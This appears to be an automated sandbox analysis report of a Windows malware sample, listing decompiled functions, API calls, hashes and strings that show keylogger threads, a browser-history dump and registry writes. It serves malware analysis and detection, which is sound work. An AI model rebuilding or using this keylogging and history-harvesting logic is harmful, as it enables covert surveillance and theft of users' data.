                                                                                                0x00447ef2
                                                                                                0x00447eed
                                                                                                0x00000000
                                                                                                0x00447f18
                                                                                                0x00447f20
                                                                                                0x00447f26
                                                                                                0x00447f28
                                                                                                0x00447f28
                                                                                                0x00447f30
                                                                                                0x00447f35
                                                                                                0x00447f3d
                                                                                                0x00447f40
                                                                                                0x00447f42
                                                                                                0x00447f56
                                                                                                0x00447f5b
                                                                                                0x00447ea1
                                                                                                0x00447ea1
                                                                                                0x00447ea2
                                                                                                0x00447ea3
                                                                                                0x00447ea4
                                                                                                0x00447ea5
                                                                                                0x00447ead
                                                                                                0x00447ead
                                                                                                0x00447ead
                                                                                                0x00447eaf
                                                                                                0x00447eb2
                                                                                                0x00447eb5
                                                                                                0x00447eb5
                                                                                                0x00447e2c
                                                                                                0x00447e2f
                                                                                                0x00447e31
                                                                                                0x00000000
                                                                                                0x00447e33
                                                                                                0x00447e33
                                                                                                0x00447e36
                                                                                                0x00447e37
                                                                                                0x00447e38
                                                                                                0x00447e39
                                                                                                0x00447e3e
                                                                                                0x00447e31
                                                                                                0x00447ebd
                                                                                                0x00447ec2
                                                                                                0x00447ecd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447d9b
                                                                                                0x00447d6f
                                                                                                0x00447d71
                                                                                                0x00447dcd
                                                                                                0x00447dd1
                                                                                                0x00447dd1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447d06
                                                                                                0x00447d09
                                                                                                0x00447d0c
                                                                                                0x00447d0f
                                                                                                0x00447d12
                                                                                                0x00447d15
                                                                                                0x00447d18
                                                                                                0x00447d18
                                                                                                0x00000000
                                                                                                0x00447cd5
                                                                                                0x00447cb7
                                                                                                0x00447cb7
                                                                                                0x00447d23
                                                                                                0x00447d25
                                                                                                0x00000000
                                                                                                0x00447d2a
                                                                                                0x00447bf9
                                                                                                0x00447bf9
                                                                                                0x00447bfc
                                                                                                0x00447c05
                                                                                                0x00447c08
                                                                                                0x00447c0f
                                                                                                0x00447c11
                                                                                                0x00447c2a
                                                                                                0x00447c2b
                                                                                                0x00447c2c
                                                                                                0x00447c2e
                                                                                                0x00447c33
                                                                                                0x00447c13
                                                                                                0x00447c13
                                                                                                0x00447c16
                                                                                                0x00447c17
                                                                                                0x00447c19
                                                                                                0x00447c1b
                                                                                                0x00447c1d
                                                                                                0x00447c22
                                                                                                0x00447c22
                                                                                                0x00447c36
                                                                                                0x00447c38
                                                                                                0x00447c3a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447c40
                                                                                                0x00447c43
                                                                                                0x00447c45
                                                                                                0x00447c47
                                                                                                0x00000000
                                                                                                0x00447c49
                                                                                                0x00447c49
                                                                                                0x00447c4c
                                                                                                0x00000000
                                                                                                0x00447c4c
                                                                                                0x00000000
                                                                                                0x00447c47
                                                                                                0x00447d2b
                                                                                                0x00447d2e
                                                                                                0x00447d33
                                                                                                0x00000000
                                                                                                0x00447d36
                                                                                                0x00447bc9
                                                                                                0x00447bc9
                                                                                                0x00447bd0
                                                                                                0x00447bd1
                                                                                                0x00447bd3
                                                                                                0x00447bd8
                                                                                                0x00447d37
                                                                                                0x00447d3b
                                                                                                0x00447d3b
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • _strpbrk.LIBCMT ref: 00447C08
                                                                                                • _free.LIBCMT ref: 00447D25
                                                                                                  • Part of subcall function 00437736: IsProcessorFeaturePresent.KERNEL32(00000017,00437708,00430D59,?,?,?,?,00000016,?,?,00437715,00000000,00000000,00000000,00000000,00000000), ref: 00437738
                                                                                                  • Part of subcall function 00437736: GetCurrentProcess.KERNEL32(C0000417,?,00430D59), ref: 0043775A
                                                                                                  • Part of subcall function 00437736: TerminateProcess.KERNEL32(00000000,?,00430D59), ref: 00437761
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                • String ID: *?$.
                                                                                                • API String ID: 2812119850-3972193922
                                                                                                • Opcode ID: a128ad8f31457049470a01bc4d3ca20c41a783d88a79eea938201ac5d679e1f9
                                                                                                • Instruction ID: 7fddc97a4e99cde9de0716c07f2153075e4cfbd40f52074104c008bc74e6faba
                                                                                                • Opcode Fuzzy Hash: a128ad8f31457049470a01bc4d3ca20c41a783d88a79eea938201ac5d679e1f9
                                                                                                • Instruction Fuzzy Hash: AC51B471D0410AAFEF14CFA9C881AAEB7B5EF48314F24816EE454E7341E7799E028B54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00440150, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 73%
                                                                                                			E00440150(void* __ebx, void* __ecx, void* __edi, void* __esi, signed short* _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				signed int _v12;
				void* _v20;
				signed int _t21;
				void* _t23;
				signed int _t27;
				signed int _t31;
				intOrPtr* _t35;
				intOrPtr* _t46;
				void* _t56;
				void* _t62;
				signed short* _t64;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t70;
				signed int _t71;
				void* _t72;
				intOrPtr* _t74;

				_t53 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x46c00c; // 0x4cc22724
				_v8 = _t21 ^ _t71;
				_t64 = _a4;
				if(_t64 != 0) {
					_t23 = E00442A3F(__ebx, __ecx, _t64, _a8);
					_pop(_t56);
					if(_t23 < _a8) {
						_t68 = 0;
						_t26 =  *((intOrPtr*)( *_a12 + 0xa8));
						if( *((intOrPtr*)( *_a12 + 0xa8)) == 0) {
							while( *_t64 != _t68) {
								_t27 =  *_t64 & 0x0000ffff;
								if(_t27 >= 0x41 && _t27 <= 0x5a) {
									 *_t64 = _t27 + 0x20;
								}
								_t64 =  &(_t64[1]);
							}
							L29:
							return E00430A5B(_v8 ^ _t71);
						}
						_t31 = E0044C20B(__ebx, _t56, _t26, 0x100, _t64, 0xffffffff, 0, 0);
						_t74 = _t72 + 0x18;
						_v12 = _t31;
						if(_t31 != 0) {
							if(_a8 >= _t31) {
								_t62 = _t31 + _t31;
								_t59 = _t62 + 8;
								asm("sbb eax, eax");
								if((_t62 + 0x00000008 & _t31) == 0) {
									L23:
									if(_t68 != 0) {
										if(E0044C20B(_t53, _t59,  *((intOrPtr*)( *_a12 + 0xa8)), 0x100, _t64, 0xffffffff, _t68, _v12) == 0) {
											_t35 = E00438932();
											_t66 = 0x2a;
											 *_t35 = _t66;
										} else {
											_t66 = E004428B4(_t64, _a8, _t68);
										}
										L28:
										E004318FD(_t68);
										goto L29;
									}
									L24:
									 *((intOrPtr*)(E00438932())) = 0xc;
									_t66 =  *((intOrPtr*)(E00438932()));
									goto L28;
								}
								asm("sbb eax, eax");
								_t41 = _t31 & _t62 + 0x00000008;
								_t59 = _t62 + 8;
								if((_t31 & _t62 + 0x00000008) > 0x400) {
									asm("sbb eax, eax");
									_t68 = E00440C6C(_t59, _t41 & _t59);
									_pop(_t59);
									if(_t68 == 0) {
										goto L24;
									}
									 *_t68 = 0xdddd;
									L22:
									_t68 = _t68 + 8;
									goto L23;
								}
								asm("sbb eax, eax");
								E004519B0();
								_t68 = _t74;
								if(_t68 == 0) {
									goto L24;
								}
								 *_t68 = 0xcccc;
								goto L22;
							}
							 *_t64 = 0;
							_t46 = E00438932();
							_push(0x22);
							L2:
							_pop(_t70);
							 *_t46 = _t70;
							E00437709();
							goto L29;
						}
						 *((intOrPtr*)(E00438932())) = 0x2a;
						E00438932();
						goto L29;
					}
					 *_t64 = 0;
				}
				_t46 = E00438932();
				_push(0x16);
				goto L2;
			}





















                                                                                                0x00440150
                                                                                                0x00440155
                                                                                                0x00440156
                                                                                                0x00440157
                                                                                                0x0044015e
                                                                                                0x00440163
                                                                                                0x00440168
                                                                                                0x00440184
                                                                                                0x0044018a
                                                                                                0x0044018e
                                                                                                0x0044019a
                                                                                                0x0044019e
                                                                                                0x004401a6
                                                                                                0x004401ef
                                                                                                0x004401d9
                                                                                                0x004401df
                                                                                                0x004401e9
                                                                                                0x004401e9
                                                                                                0x004401ec
                                                                                                0x004401ec
                                                                                                0x004402c6
                                                                                                0x004402d8
                                                                                                0x004402d8
                                                                                                0x004401b3
                                                                                                0x004401b8
                                                                                                0x004401bb
                                                                                                0x004401c0
                                                                                                0x004401fe
                                                                                                0x00440211
                                                                                                0x00440214
                                                                                                0x00440219
                                                                                                0x0044021d
                                                                                                0x00440267
                                                                                                0x00440269
                                                                                                0x004402a0
                                                                                                0x004402b3
                                                                                                0x004402ba
                                                                                                0x004402bb
                                                                                                0x004402a2
                                                                                                0x004402af
                                                                                                0x004402af
                                                                                                0x004402bd
                                                                                                0x004402be
                                                                                                0x00000000
                                                                                                0x004402c4
                                                                                                0x0044026b
                                                                                                0x00440270
                                                                                                0x0044027b
                                                                                                0x00000000
                                                                                                0x0044027b
                                                                                                0x00440224
                                                                                                0x00440226
                                                                                                0x00440228
                                                                                                0x00440230
                                                                                                0x0044024d
                                                                                                0x00440257
                                                                                                0x00440259
                                                                                                0x0044025c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044025e
                                                                                                0x00440264
                                                                                                0x00440264
                                                                                                0x00000000
                                                                                                0x00440264
                                                                                                0x00440234
                                                                                                0x00440238
                                                                                                0x0044023d
                                                                                                0x00440241
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440243
                                                                                                0x00000000
                                                                                                0x00440243
                                                                                                0x00440202
                                                                                                0x00440205
                                                                                                0x0044020a
                                                                                                0x00440171
                                                                                                0x00440171
                                                                                                0x00440172
                                                                                                0x00440174
                                                                                                0x00000000
                                                                                                0x00440179
                                                                                                0x004401c7
                                                                                                0x004401cd
                                                                                                0x00000000
                                                                                                0x004401d2
                                                                                                0x00440192
                                                                                                0x00440192
                                                                                                0x0044016a
                                                                                                0x0044016f
                                                                                                0x00000000

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __alloca_probe_16__freea
                                                                                                • String ID: *xA$hpg
                                                                                                • API String ID: 1635606685-3778963461
                                                                                                • Opcode ID: 62589f24e243c4a248a7fedd564adf527f79b85e0f2386475182e05b8b552cab
                                                                                                • Instruction ID: 7156e76f828b6645a92db5cafd045523bd31c128b28bfa575c99f94bcb68196a
                                                                                                • Opcode Fuzzy Hash: 62589f24e243c4a248a7fedd564adf527f79b85e0f2386475182e05b8b552cab
                                                                                                • Instruction Fuzzy Hash: 82413671A10201ABEB20AFA5CC46E6FB7A0BF05710F14456FF904CB290EBBCDC51879A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040412E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 90%
                                                                                                			E0040412E(void* __ebx) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __edi;
				void* _t40;
				struct HINSTANCE__* _t81;
				struct HINSTANCE__* _t84;
				void* _t85;

				_t48 = __ebx;
				_t81 = 0;
				GetModuleFileNameW(0,  &_v692, 0x104);
				E004020C7(__ebx,  &_v52);
				E004189FF( &_v28, 0x30, E00401F87(E00417A83( &_v76)));
				E00401FB9();
				E00401F87(0x46e1a0);
				E00414D29(E00401EDD(E00403098(_t48,  &_v100, E0040440A(_t48,  &_v124, E004043E6(_t48,  &_v148,  &_v692, 0, E00404260(__ebx,  &_v172, L" /sort \"Visit Time\" /stext \"")), 0,  &_v28), 0, 0, "\"")));
				E00401EE2();
				E00401EE2();
				E00401EE2();
				E00401EE2();
				_t84 = 0;
				while(1) {
					_t40 = E00401EDD( &_v28);
					_t80 =  &_v52;
					if(E004183CC(_t40,  &_v52) != 0) {
						break;
					}
					Sleep(0xfa);
					_t84 =  &(_t84->i);
					if(_t84 < 0x14) {
						continue;
					} else {
					}
					L5:
					E00401EE2();
					E00401FB9();
					return _t81;
				}
				E004020DE(_t48, _t85 - 0x18,  &_v52, __eflags,  &_v52);
				_push(0x9d);
				E00404BB7(_t48, 0x46e120, _t80, __eflags);
				_t81 = 1;
				__eflags = 1;
				goto L5;
			}
















                                                                                                0x0040412e
                                                                                                0x00404145
                                                                                                0x00404148
                                                                                                0x00404151
                                                                                                0x0040416b
                                                                                                0x00404174
                                                                                                0x0040417e
                                                                                                0x004041d2
                                                                                                0x004041da
                                                                                                0x004041e2
                                                                                                0x004041ed
                                                                                                0x004041f8
                                                                                                0x004041fd
                                                                                                0x004041ff
                                                                                                0x00404202
                                                                                                0x00404207
                                                                                                0x00404213
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040421a
                                                                                                0x00404220
                                                                                                0x00404224
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00404226
                                                                                                0x00404248
                                                                                                0x0040424b
                                                                                                0x00404253
                                                                                                0x0040425f
                                                                                                0x0040425f
                                                                                                0x00404231
                                                                                                0x00404236
                                                                                                0x00404240
                                                                                                0x00404247
                                                                                                0x00404247
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404148
                                                                                                  • Part of subcall function 00417A83: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040415E), ref: 00417AAA
                                                                                                  • Part of subcall function 00414D29: CloseHandle.KERNEL32(004041D7,?,004041D7,004604D4), ref: 00414D3F
                                                                                                  • Part of subcall function 00414D29: CloseHandle.KERNEL32(004604D4,?,004041D7,004604D4), ref: 00414D48
                                                                                                  • Part of subcall function 004183CC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404211,004604D4), ref: 004183E9
                                                                                                • Sleep.KERNEL32(000000FA,004604D4), ref: 0040421A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                • String ID: /sort "Visit Time" /stext "$ F
                                                                                                • API String ID: 368326130-1930567
                                                                                                • Opcode ID: f9f3ba3638950660a3e19d592959a109d22f613aacbdbe36cc78b9c9e0b77167
                                                                                                • Instruction ID: 863f7f6ed9b6a4ba0e83b14e1deb0d35d7da8232c27f4bb5a456acaa0dc9c8f6
                                                                                                • Opcode Fuzzy Hash: f9f3ba3638950660a3e19d592959a109d22f613aacbdbe36cc78b9c9e0b77167
                                                                                                • Instruction Fuzzy Hash: DB31A471A0021957CB14FBB2DC96AED7379AF90308F10017FF606771D2EE38598AC699
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00418900, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SystemParametersInfoW.USER32 ref: 004189F5
                                                                                                  • Part of subcall function 00410AD6: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 00410AE5
                                                                                                  • Part of subcall function 00410AD6: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00410CFC,?,00000000), ref: 00410B0D
                                                                                                  • Part of subcall function 00410AD6: RegCloseKey.ADVAPI32(00000000,?,?,?,00410CFC,?,00000000), ref: 00410B18
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                • API String ID: 4127273184-3576401099
                                                                                                • Opcode ID: 23923dffcd036693881389750fcc9575d6728d19f00af5dc63293092ce265d11
                                                                                                • Instruction ID: ae53d4fe04936d8600cf86c77e97be1cc5f05394fb2188ffd1b7f87bdbcf8586
                                                                                                • Opcode Fuzzy Hash: 23923dffcd036693881389750fcc9575d6728d19f00af5dc63293092ce265d11
                                                                                                • Instruction Fuzzy Hash: A0115E72F8034023D918313A8E1BBBF2816A746B94F61411FFA023A6D6E8DF0D9142DF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00408778, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 84%
                                                                                                			E00408778(void* __ecx, char _a4) {
				char _v28;
				char _v32;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* _t21;
				void* _t39;
				signed int _t41;
				void* _t43;

				_t43 = (_t41 & 0xfffffff8) - 0x1c;
				_push(_t21);
				_t39 = __ecx;
				_t2 = _t39 + 0x60; // 0x46e410
				 *((char*)(__ecx + 0x49)) = 1;
				E00409E07(_t2,  &_a4);
				_t47 =  *0x46c9c4 - 0x32;
				_t35 = "Offline Keylogger Started";
				if( *0x46c9c4 != 0x32) {
					E00402076(_t21,  &_v28, "Offline Keylogger Started");
					_t43 = _t43 - 0x18;
					E00417CCA(_t43,  &_v32);
					E0040964B(_t21, _t39, _t47);
					E00401FB9();
				}
				_t44 = _t43 - 0x18;
				E00402076(_t21, _t43 - 0x18, _t35);
				E00402076(_t21, _t44 - 0x18, "i");
				E00417670(_t21, _t35);
				CreateThread(0, 0, 0x408881, _t39, 0, 0);
				if( *_t39 == 0) {
					CreateThread(0, 0, E00408866, _t39, 0, 0);
				}
				CreateThread(0, 0, E00408890, _t39, 0, 0);
				return E00401EE2();
			}












                                                                                                0x0040877e
                                                                                                0x00408784
                                                                                                0x00408786
                                                                                                0x0040878a
                                                                                                0x0040878d
                                                                                                0x00408791
                                                                                                0x00408796
                                                                                                0x0040879d
                                                                                                0x004087a2
                                                                                                0x004087a9
                                                                                                0x004087ae
                                                                                                0x004087b7
                                                                                                0x004087be
                                                                                                0x004087c7
                                                                                                0x004087c7
                                                                                                0x004087cc
                                                                                                0x004087d2
                                                                                                0x004087e1
                                                                                                0x004087e6
                                                                                                0x00408800
                                                                                                0x00408804
                                                                                                0x00408810
                                                                                                0x00408810
                                                                                                0x0040881c
                                                                                                0x0040882c

                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00408881,0046E3B0,00000000,00000000), ref: 00408800
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00408866,0046E3B0,00000000,00000000), ref: 00408810
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00408890,0046E3B0,00000000,00000000), ref: 0040881C
                                                                                                  • Part of subcall function 0040964B: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046E3B0), ref: 00409659
                                                                                                  • Part of subcall function 0040964B: wsprintfW.USER32 ref: 004096DA
                                                                                                  • Part of subcall function 0040964B: SetEvent.KERNEL32(00000000,00000000), ref: 00409704
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread$EventLocalTimewsprintf
                                                                                                • String ID: Offline Keylogger Started
                                                                                                • API String ID: 3534694722-4114347211
                                                                                                • Opcode ID: 6e56a4a99483b81f26fc6d16ba00d676ec43afe92940d47bb1c87568e2294148
                                                                                                • Instruction ID: 30c56473880c3e9422065a6abdf75e774aa353cf5cd5e57a352aec234575af3c
                                                                                                • Opcode Fuzzy Hash: 6e56a4a99483b81f26fc6d16ba00d676ec43afe92940d47bb1c87568e2294148
                                                                                                • Instruction Fuzzy Hash: 0E119BB15003087AD210B63ACDCADBF3A5CDA81398B40453EF585221D3EEB95D15C6FA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004093D2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 89%
                                                                                                			E004093D2(void* __ecx) {
				char _v28;
				void* __ebx;
				void* __edi;
				void* _t7;
				void* _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t30 = __ecx;
				_t36 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					_t28 = "Online Keylogger Started";
					 *((char*)(__ecx + 0x4a)) = 1;
					E00402076(_t18,  &_v28, "Online Keylogger Started");
					_t32 = _t31 - 0x18;
					E00417CCA(_t32,  &_v28);
					E0040964B(_t18, _t30, _t36);
					E00401FB9();
					_t33 = _t32 - 0x18;
					E00402076(_t18, _t32 - 0x18, "Online Keylogger Started");
					E00402076(_t18, _t33 - 0x18, "i");
					E00417670(_t18, _t28);
					if( *((intOrPtr*)(_t30 + 0x49)) == 0) {
						if( *_t30 == 0) {
							CreateThread(0, 0, E00408866, _t30, 0, 0);
						}
						CreateThread(0, 0, E00408890, _t30, 0, 0);
					}
					return CreateThread(0, 0, E0040889F, _t30, 0, 0);
				}
				return _t7;
			}











                                                                                                0x004093da
                                                                                                0x004093dd
                                                                                                0x004093e1
                                                                                                0x004093e7
                                                                                                0x004093ec
                                                                                                0x004093f4
                                                                                                0x004093f9
                                                                                                0x00409401
                                                                                                0x00409408
                                                                                                0x00409410
                                                                                                0x00409415
                                                                                                0x0040941b
                                                                                                0x0040942a
                                                                                                0x0040942f
                                                                                                0x00409442
                                                                                                0x00409446
                                                                                                0x00409452
                                                                                                0x00409452
                                                                                                0x0040945e
                                                                                                0x0040945e
                                                                                                0x00000000
                                                                                                0x0040946a
                                                                                                0x00409472

                                                                                                APIs
                                                                                                  • Part of subcall function 0040964B: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046E3B0), ref: 00409659
                                                                                                  • Part of subcall function 0040964B: wsprintfW.USER32 ref: 004096DA
                                                                                                  • Part of subcall function 0040964B: SetEvent.KERNEL32(00000000,00000000), ref: 00409704
                                                                                                  • Part of subcall function 00417670: GetLocalTime.KERNEL32(00000000), ref: 0041768A
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00008866,?,00000000,00000000), ref: 00409452
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00008890,?,00000000,00000000), ref: 0040945E
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000889F,?,00000000,00000000), ref: 0040946A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread$LocalTime$Eventwsprintf
                                                                                                • String ID: Online Keylogger Started
                                                                                                • API String ID: 3546759147-1258561607
                                                                                                • Opcode ID: 60de90cad66a9d8f035618c7fb2fb3f7ba4be0881d8a7d55411ee6faaa3baa24
                                                                                                • Instruction ID: 5de0d69755c2a9e5944a5a1dc46751dcbc9bef3fcf82e1a3c4b8c65ac349be55
                                                                                                • Opcode Fuzzy Hash: 60de90cad66a9d8f035618c7fb2fb3f7ba4be0881d8a7d55411ee6faaa3baa24
                                                                                                • Instruction Fuzzy Hash: 7F01C8A1A043483ED62076768D8AD7F7A2CDA81398F40047EF685361C7E9B95C4583FA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00405248, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 84%
                                                                                                			E00405248(void* __edx) {
				void* __ebx;
				void* __ecx;
				long _t19;
				void* _t24;
				intOrPtr _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				intOrPtr _t39;

				_t29 = __edx;
				_t31 = _t24;
				 *((intOrPtr*)(_t31 + 0x78)) = 0;
				if( *((intOrPtr*)(_t31 + 0x74)) <= 0) {
					L3:
					 *((char*)(_t31 + 0x5c)) = 0;
					_t39 =  *0x46daf7; // 0x0
					if(_t39 != 0) {
						_t33 = _t32 - 0x18;
						E00402076(0, _t32 - 0x18, "Connection Timeout");
						E00402076(0, _t33 - 0x18, "E");
						E00417670(0, _t30);
					}
					E00404F18(_t31, _t29);
					return 1;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t19 = WaitForSingleObject( *(_t31 + 0x60), 0x3e8);
					 *((intOrPtr*)(_t31 + 0x78)) =  *((intOrPtr*)(_t31 + 0x78)) + 1;
					_t28 =  *((intOrPtr*)(_t31 + 0x78));
					if(_t19 == 0) {
						break;
					}
					if(_t28 <  *((intOrPtr*)(_t31 + 0x74))) {
						continue;
					}
					goto L3;
				}
				CloseHandle( *(_t31 + 0x60));
				 *(_t31 + 0x60) = 0;
				 *((char*)(_t31 + 0x5c)) = 0;
				SetEvent( *(_t31 + 0x64));
				return 0;
			}













                                                                                                0x00405248
                                                                                                0x0040524b
                                                                                                0x0040524f
                                                                                                0x00405255
                                                                                                0x00405274
                                                                                                0x00405274
                                                                                                0x00405277
                                                                                                0x0040527d
                                                                                                0x0040527f
                                                                                                0x00405289
                                                                                                0x00405298
                                                                                                0x0040529d
                                                                                                0x004052a2
                                                                                                0x004052a7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405257
                                                                                                0x00405257
                                                                                                0x0040525f
                                                                                                0x00405265
                                                                                                0x00405268
                                                                                                0x0040526d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405272
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405272
                                                                                                0x004052b6
                                                                                                0x004052bf
                                                                                                0x004052c2
                                                                                                0x004052c5
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405243), ref: 0040525F
                                                                                                • CloseHandle.KERNEL32(?), ref: 004052B6
                                                                                                • SetEvent.KERNEL32(?), ref: 004052C5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                                                • String ID: Connection Timeout
                                                                                                • API String ID: 2055531096-499159329
                                                                                                • Opcode ID: f7148c9f6f24c60fa663259e72a505c4a84419367b1b05d43e51b382b15f9c92
                                                                                                • Instruction ID: 70729764d5a041a408144c5938078ccf91f98fddcaad8920339c749be8e44bc5
